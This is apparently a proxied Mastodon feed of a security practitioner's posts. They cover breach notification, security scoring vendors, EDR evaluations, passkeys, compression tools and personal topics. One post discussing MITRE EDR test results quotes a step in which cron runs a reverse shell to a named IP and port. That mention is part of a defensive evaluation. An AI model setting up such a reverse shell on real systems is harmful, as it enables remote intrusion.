Interesting to see @haveibeenpwned / @troyhunt having decided to start offering "Threat Intelligence".
While I understand the thinking, the quote from the article
But even when you get the full dump of the data from the shadiest providers*, it's just been a waste of time.
Sure, there is some value in informing people about problems. But it's important to provide actionable information.
A better approach might be to provide this information to the breached sites to allow them to 1. validate the information. 2. inform the users. 3. force changes.
That approach has it's own problems**, but seems like it more effectively attacks the core of the problem instead of the symptom.
And if that is not possible, then maybe something proactive like identity-protection services which you pay to take actions on your behalf of any data.
Maybe this isn't something Troy wants to do, which is fine. But I felt like I needed to write down my thoughts on why I don't think it's the right approach.
Footnotes:
=> More informations about this toot | View the thread
Rate my #homeassistant - dashboard
It's getting there, slowly. Running on my old trusty iPad2. Getting that to work took a bit of trickery as the HS dashboard required modern JS, but #novnc to the rescue. I'll write it up soon.
=> More informations about this toot | View the thread
Oh fantastic to hear @riskybusiness and @metlstorm say it out loud.
Securityscorecard and similar scoring services are a very coarse proxy for the state of security at a company.
I recently spent many emails and meetings trying to explain to a customer why our low score due to mostly a few services missing accepting older tls and missing security http headers is not a sign we don't take security seriously. And that the outdated version of software A (which we have many of and was a big contributor to the low score) , while not optimal is not a priority because of how we use it and the mitigations we have in place.
In the end it was easier to remove the version from the header than to get them to accept that the security scoring service was wrong in this case.
Also the whole business of how they force you to get a proper view of why your score is bad does not seem like an ethical business practice either.
https://overcast.fm/+AAIt0hlU9MU/24:49
=> More informations about this toot | View the thread
Random thought which hit me some day ago
A strong driver of complexity is that it hides incompetence.
It's probably not a novel idea but I feel it explains so much of what is happening in this field.
It's probably something @ludicity wrote which my subconscious has been processing.
=> More informations about this toot | View the thread
https://securitycryptographywhatever.com/ is the most approachable cryptography podcast I know. Here is my favourite episodes
Whats wrong with JWT and what to use instead with @titanous https://overcast.fm/+AAxz8XW2b7M
The non marketing take on Zero Trust with @konklone
https://overcast.fm/+AAxz8X8qQgQ
Software Safety with @kevinriggle https://overcast.fm/+AAxz8VogJiY
SOC2 with @worldwise001 https://overcast.fm/+AAxz8Vrq84s
=> More informations about this toot | View the thread
A key part of me keeping my social media usage healthy and enjoyable is a chronological timeline which remembers where I left off.
Instead of scrolling down towards infinity I scroll up towards now. I also find that makes it much easier to follow the development of news and discussions.
Also no notifications, or if you must, make them go into the summary.
And unfollow/mute aggressively, unless you're getting joy from social media, why do you do it?
[#]mastodon #mentalhealth #life
=> More informations about this toot | View the thread
Ugh, the #chrome #extension ecosystem is exactly as bad as I'd expect.
And the fact extension is still up claiming not to collect any data even if it has been called out in one of the biggest security newsletters shows how much Google care about this (not much). The only thing they care about is pretending to ship AI features to detect malicious extensions. Because that's how you get promoted.
I mean is it even possible to report a suspicious or bad extension? I don't see anywhere
Great research by @WPalant and @c0m4r
And @campuscodi for putting the spotlight on it.
=> View attached media | View attached media
=> More informations about this toot | View the thread
The #mitre #engenuity attack evaluation project is super interesting and well done
I'm looking at Linux EDR solutions, and there seems to be is very little info out there about how they perform. But this is a great source of info after you figure out how it works and it really shows how the tools work.
For example, take a look here, a comparison of fortinet, crowdstrike and palo alto, to help you understand what you are looking at and keep the focus on Linux for now, start with unchecking all the steps before 9.7 (which will limit it to Linux).
Now in the summary, you will see a lot of purple. Purple means the EDR saw the activity.
This is somewhat interesting, most are quite good at finding things, but what I find to be really interesting is when you scroll down, you can see screenshots of the activity as it shows up in the EDR console. I find this the real value, as it gives a rare glimpse into how different solutions present the information. Because I think this is a key part of how useful software is. A EDR will by definition collect much more info than it needs, and then the important part becomes presenting the information in a usable way that allows the end user (threat hunter) to quickly figure out if something is malicious or not.
Blocking or alerting on it is of course the other important thing, and that is not tested in this Scenario (more on that in a moment). But I think the screenshots give an idea for most of the products if it would have been an alert.
For example this one is interesting to look at
(Linux) cron executes a reverse shell to 176.59.15.33:8081
For FortiNet, they are only showing the Threat Hunting view so hard to tell if FortiEDR has generated an alert or not and what severity.
[#]linux #edr #mitre #engenuity
=> More informations about this toot | View the thread
I was really hopeful when I saw the news about this. But after reading the list of restrictions on a "Teen" account I couldn't stop thinking about the likeness to the tobacco companies campaigns with "Light" and "Low-Nicotine".
=> More informations about this toot | View the thread
Facebook/Meta introduces ~Camel Light~ Instagram Teen, it's the healthy choice that doctors recommend.
https://about.fb.com/news/2024/09/instagram-teen-accounts/
[#]instagram #totallynottobacco
=> More informations about this toot | View the thread
@things is apples cloud-syncing really so much worse than doing it yourself?
I like everything about your app, but the fact that you have your own syncing is a killer for me. I just don't see how a small company like yours would be able to assign enough resources to protect the data, and even if the risk is small there are 100 other todo apps out there which does not have this risk so I'll just have to pass for now.
Seems like outsourcing that part to Apple would be a win-win and allow you to focus on the app not the servers.
=> More informations about this toot | View the thread
I'm apparently not alone in doing this... feels silly but I'd rather miss out on some new features than have a app change/break silently with no way for me to roll back...
https://mjtsai.com/blog/2024/07/18/overcasts-new-foundation/
Also I'm curious, the "unimplemented old features" wouldn't be one tap play would it?
@mjtsai
=> More informations about this toot | View the thread
Anyone have recommendations for durable dog toys? Preferably natural materials.
I've only managed to find one or two in local stores so now I ordered a bunch all the way from Austria. From a company called GogiPet who had good marketing about being natural materials and such.
But the first one seems to be same stuff as everything else, looks like it's starting to break open after she played with it 15 minutes.
They had more sturdy looking things also which I'll let her test at some other point, but I'd love to find a company that just makes good stuff.
[#]mastodogs
=> View attached media | View attached media | View attached media
=> More informations about this toot | View the thread
Ok found a blog post explaining it, from my reading it's equally good (or bad) as the Apple one.
So I'm going to put in the #passwordpolicy that synced passkeys are OK.
But I'd love for someone with real experience extracting/stealing these to tell me why I'm wrong about this and why it'll get us hacked.
=> More informations about this toot | View the thread
How well are #Passkeys protected on Android / Google Password Manager?
According to this article, on Mac/iOS it relies on the Keychain and Hello on Windows, while not perfect it feels like it would offer some resistance against stealers where they would at least need to prompt the user vs silently being able to extract them?
But how about #Android and #malware ? I would assume it's equally well protected but I can't find any information.
=> More informations about this toot | View the thread
Has anyone made or know of a tool to check if a twitter account has moved or has profiles on any of the other social media places?
Every now and then I find a twitter account I'd like to follow I don't use xitter anymore.
So I manually open Mastodon, BlueSky and Threads to check if they have accounts. Which is kind of a pain. I was thinking there should be a #OSINT tool which would provide some faster way to search all of them?
None of the ones I found by quickly searching seemed to support these newer networks.
[#]mastohelp
=> More informations about this toot | View the thread
I was also going to say use zstd if you have the choice... but then I found a interesting benchmark which, as far as I read it, shows igzip being faster while giving very similar compression levels on that test case which is a 100 MiB html file
so I might have to revise my standard "use #zstd" to "use #igzip"
not yet though, need to do a bit more benchmarking and dog-fooding igzip
=> More informations about this toot | View the thread
also don't miss igzip available for most distro and os' which gives 2x single core performance "for free"
=> More informations about this toot | View the thread
PSA: If you need lots of gzipped data decompressed, the limiting factor has usually been the single-threadedness of gzip.
For compression pigz has been around for a while, and it seems someone has finally figured out parallel decompression
First pugz did text, and now rapidgzip
now the slow spinning disks are the problem not the cpu
[#]gzip #parallel
=> More informations about this toot | View the thread
@troyhunt is there some way for me to submit hashes of additional known compromised passwords to pwned passwords database?
I'm thinking I'd like to outsource all the bad-password check to the pwned passwords api and not all our known bad or leaked passwords are in the pubic leaks which has been imported.
I'm not sure if this is actually a good idea or scalable, so I'm curious hear your thoughts on this?
Another benefit from this would be that any SaaS provider we use that checks against the API would automatically blacklist all our bad passwords also.
=> More informations about this toot | View the thread
=> This profile with reblog | Go to gnyman@infosec.exchange account This content has been proxied by September (ba2dc).Proxy Information
text/gemini